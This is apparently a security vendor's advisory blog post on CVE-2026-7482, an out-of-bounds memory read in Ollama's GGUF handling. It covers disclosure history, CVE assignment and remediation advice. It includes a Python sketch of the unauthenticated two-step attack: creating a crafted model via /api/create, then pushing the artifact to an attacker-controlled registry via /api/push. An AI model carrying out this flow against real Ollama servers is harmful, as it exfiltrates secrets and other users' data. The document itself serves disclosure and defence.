CVE-2026-7482: Critical Ollama memory vulnerability explained

Mor Weinberger
May 05, 2026 | 8 Minutes

Key takeaways

  • Cyera discovered and disclosed a critical vulnerability in Ollama; Echo assigned and published the CVE to make it visible to the broader security ecosystem
  • The Ollama vulnerability allows unauthenticated attackers to extract sensitive data directly from memory
  • The issue affects every version prior to v0.17.1 and requires immediate patching
  • Around 300,000 internet-facing instances are potentially exposed due to common deployment practices
  • The fix was released without clearly communicating that it was a security issue

Earlier this year, researchers at Cyera uncovered a critical vulnerability in Ollama, one of the most widely used open-source tools for running large language models.

They followed the responsible disclosure process closely:

  • The issue was reported
  • The vendor eventually acknowledged it
  • A fix was developed and validated

On paper, it looked like a success: a serious vulnerability identified and patched within a reasonable timeframe. But what happened next is where things started to break down.

Once the fix shipped, there was a clear disconnect between what had happened behind the scenes and what users could actually see. The release notes focused on new features and performance improvements, with no security advisory or CVE attached to the release.

So, if you were running Ollama, there was nothing that made this update stand out. No signal that this was urgent or any indication that failing to upgrade could leave your system exposed.

So while the vulnerability had technically been fixed, in practice it remained very much alive.

What is CVE-2026-7482?

CVE-2026-7482 is a memory disclosure vulnerability rooted in how Ollama handles GGUF model files.

The server trusts the tensor dimensions provided inside these files without enforcing proper bounds checking, which means a specially crafted model can manipulate how memory is read during processing – causing the system to pull data from beyond its allocated buffers.
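The missing validation can be illustrated with a short sketch. This is not Ollama's actual GGUF parsing code (which is written in Go and C++); it is a simplified Python model of the bounds check whose absence causes the out-of-bounds read:

```python
def read_tensor(buffer: bytes, offset: int, dims: list[int], elem_size: int) -> bytes:
    """Read one tensor's data from a buffer, validating attacker-supplied dimensions.

    `dims` comes straight from the GGUF file, so it must be bounds-checked
    before it is used to compute a read length.
    """
    n_elems = 1
    for d in dims:
        if d <= 0:
            raise ValueError(f"invalid tensor dimension: {d}")
        n_elems *= d
    length = n_elems * elem_size
    # Without this check, a crafted file can make the read run past the end
    # of the allocated buffer -- the root cause of CVE-2026-7482.
    if offset < 0 or offset + length > len(buffer):
        raise ValueError("tensor extends beyond buffer bounds")
    return buffer[offset:offset + length]
```

A file that declares dimensions larger than the data it actually contains is exactly the input this check rejects.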

What gets exposed can include environment variables, API keys, system prompts, and even fragments of other users’ interactions. Because this data is folded into the output artifact, it can be quietly extracted without triggering errors or crashes.

This is what makes the vulnerability particularly dangerous. It doesn’t interrupt the system, it just quietly turns it into a data leak.

How the Ollama vulnerability is exploited

From an attacker’s perspective, the barrier to entry is low. They upload a malicious GGUF file using the /api/create endpoint. When Ollama processes it, the manipulated tensor dimensions cause the server to read unintended areas of memory. That data becomes part of the generated model artifact. From there, the attacker uses the /api/push endpoint to send the artifact to a registry they control, effectively exfiltrating whatever sensitive data was captured.

Neither endpoint requires authentication.

So, in environments where Ollama is exposed, which is more common than it should be, this can be executed remotely without credentials and without obvious indicators that anything is wrong.
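The two-step flow above can be sketched as a pair of unauthenticated API calls. The endpoint paths (`/api/create`, `/api/push`) are Ollama's, but the payload fields shown here are simplified placeholders, and the function only describes the requests rather than sending them; this is not a working exploit:

```python
def build_attack_requests(target: str, model_name: str, attacker_registry: str) -> list[dict]:
    """Describe the two unauthenticated API calls an attacker would chain.

    Returns request descriptions only; nothing is sent over the network.
    """
    return [
        {
            # Step 1: register a crafted GGUF model whose tensor dimensions
            # trigger out-of-bounds reads when the server processes the file.
            "method": "POST",
            "url": f"{target}/api/create",
            "body": {"name": model_name},  # crafted GGUF supplied alongside
        },
        {
            # Step 2: push the resulting artifact -- which now embeds the
            # leaked memory -- to a registry the attacker controls.
            "method": "POST",
            "url": f"{target}/api/push",
            "body": {"name": f"{attacker_registry}/{model_name}"},
        },
    ]
```

Note that neither request carries a token, cookie, or credential of any kind; the API simply does not ask for one.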

Why the Ollama vulnerability is especially risky

Ollama assumes a local environment, but often isn't deployed in one

Ollama was designed as a localhost tool, which is why it doesn’t include authentication.

And while that assumption might hold in a controlled development setup, it rarely holds in production. In practice, teams deploy Ollama in containers, expose it to other services, or configure it to listen on all interfaces to support multi-client use. In many cases, this is even encouraged in documentation.

The result? A large number of instances are running with a zero-auth API, accessible from the network. So, what started as a local tool becomes an internet-facing service, without any of the protections that would normally be expected in that context. And at scale, that’s how teams wind up with hundreds of thousands of exposed instances.

The fix didn’t look urgent

The vulnerability was fixed relatively quickly after Cyera reported it, but the release that included the fix didn’t frame it as a security update. Instead, it simply highlighted new capabilities and improvements.

There was no indication that a critical issue had been addressed, and no CVE to reinforce the severity. So, for most teams, it didn’t rise to the top of the backlog.

Updates get prioritized based on perceived risk, and in this case, that signal wasn’t there. So the fixed vulnerability continued to pose a real risk in production environments – without teams even knowing.

Without a CVE, it’s effectively invisible

After the fix was released, Cyera submitted a CVE request through MITRE, which sat unresolved for months.

During that time, the vulnerability didn’t appear in scanning tools or vulnerability feeds. Security teams relying on automated detection had no way to identify affected systems or understand their exposure.

This highlights a core dependency in modern security workflows: without a CVE, a vulnerability is difficult to track, prioritize, or even notice. The delay didn’t just slow down documentation – it actually delayed real-world response.

Where Echo stepped in

At that point, Cyera turned to Echo, a registered CNA, to move the process forward.

Echo’s team performed its own technical validation against the fix and assigned CVE-2026-7482. It also ensured that the original request to MITRE was withdrawn to avoid duplicate records and unnecessary noise in the ecosystem.

The Echo team then published a complete CVE record with detailed context, including the full disclosure timeline, affected components, scoring, and practical guidance for users. That level of detail matters because it turns a fairly vague risk into something teams can actually understand and act on.

And, more importantly, it made the vulnerability visible.

Once the CVE was published, scanners could detect it, platforms could surface it, and organizations could finally respond effectively.

What this incident reveals about security today

This security incident surfaces a few patterns that are becoming harder to ignore.

  1. AI infrastructure is being deployed in ways that don’t match its original security assumptions. Tools built for local use are increasingly exposed in production environments, often without additional safeguards.
  2. The vulnerability ecosystem still has critical bottlenecks. Even when researchers and vendors move quickly, delays in CVE assignment can create real gaps in visibility.
  3. Communication plays a bigger role than most teams expect. If a fix doesn’t clearly communicate risk, it often doesn’t get prioritized – regardless of how severe the underlying issue is.

What you should do if you’re using Ollama

If you’re running Ollama, start by upgrading to version 0.17.1 or later to eliminate the underlying vulnerability. Then take a closer look at how your instance is exposed. If it’s reachable from the public internet, restrict access using network controls or place it behind a secured proxy. Reducing exposure is just as important as patching.
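To confirm the patch is actually in place, the version reported by the server's `GET /api/version` endpoint (which returns JSON such as `{"version": "0.17.1"}`) can be compared against the fixed release. A small comparison sketch:

```python
def is_patched(version: str, fixed: str = "0.17.1") -> bool:
    """Return True if `version` is at least the release that fixes CVE-2026-7482."""
    def parts(v: str) -> tuple[int, ...]:
        # Accept an optional leading "v" and compare numerically, so that
        # e.g. "0.9.0" is correctly treated as older than "0.17.1".
        return tuple(int(p) for p in v.lstrip("v").split("."))
    return parts(version) >= parts(fixed)
```

Feeding in the string from `/api/version` across your fleet gives a quick inventory of which instances still need the upgrade.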

If your instance was publicly accessible, it’s also worth assuming that sensitive data may have been exposed, so rotating credentials, reviewing logs, and auditing outputs can help lower the risk of lingering impact.

FAQs

What is CVE-2026-7482?

CVE-2026-7482 is a critical memory disclosure vulnerability in Ollama that allows attackers to read sensitive data from system memory. It occurs because the server trusts attacker-controlled input without properly validating it, which can lead to unintended data exposure during normal processing.

Who discovered CVE-2026-7482?

The vulnerability was discovered by researchers at Cyera, who followed a responsible disclosure process. They worked with the vendor to validate the issue and confirm that the fix addressed the root cause before moving forward with broader publication.

What did Echo do about CVE-2026-7482?

Echo acted as the CVE Numbering Authority (CNA) and assigned CVE-2026-7482 after delays in the traditional process. It also published a detailed CVE record, making the vulnerability visible to security tools and enabling organizations to detect and respond to it.

Which versions are affected?

All versions of Ollama prior to 0.17.1 are affected by this vulnerability. Any system running an earlier version should be considered at risk and updated as soon as possible.

Does this require authentication?

No, the vulnerability can be exploited without authentication if the Ollama instance is exposed to the network. This significantly increases the risk, as attackers do not need prior access or credentials to carry out the attack.

Why wasn’t this caught earlier?

Although the vulnerability was reported and fixed, it wasn’t clearly communicated as a security issue in the release notes. In addition, delays in CVE assignment meant it didn’t appear in vulnerability feeds or scanning tools for an extended period.

What should I do?

You should upgrade to the latest version of Ollama immediately to address the vulnerability. It’s also important to restrict network exposure and rotate any sensitive credentials that may have been exposed if your instance was publicly accessible.
